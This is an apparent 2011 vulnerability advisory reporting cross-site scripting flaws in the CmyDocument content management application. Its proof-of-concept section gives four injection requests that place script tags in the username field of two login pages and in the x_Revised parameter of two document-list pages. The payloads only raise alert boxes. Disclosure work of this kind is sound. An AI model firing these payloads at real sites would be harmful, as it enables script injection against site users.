CmyDocument Content Management Application - XSS Vulnerabilities

2011-11-06T00:00:00
ID SECURITYVULNS:DOC:27277
Type securityvulns
Reporter Securityvulns
Modified 2011-11-06T00:00:00

Description

Title: CmyDocument Content Management Application - XSS Vulnerabilities

Software : CmyDocument Content Management Application

Software Version : Unknown(version update : 2010-01-10)

Vendor: http://cmydocument.com/

Vulnerability Published : 2011-07-11

Vulnerability Update Time :

Status :

Impact : Medium

Bug Description : CmyDocument Content Management Application(version update : 2010-01-10, possibly earlier versions) is vulnerable to XSS.

Proof Of Concept : 1)username in login.asp,PoC: POST http://192.168.10.202/login.asp


username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

2)username in login2.asp,PoC: POST http://192.168.10.202/login2.asp


username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

3)x_Revised in myDoclist.asp,PoC: http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

4)x_Revised in myWebDoclist.asp,PoC: http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/PolyU.HK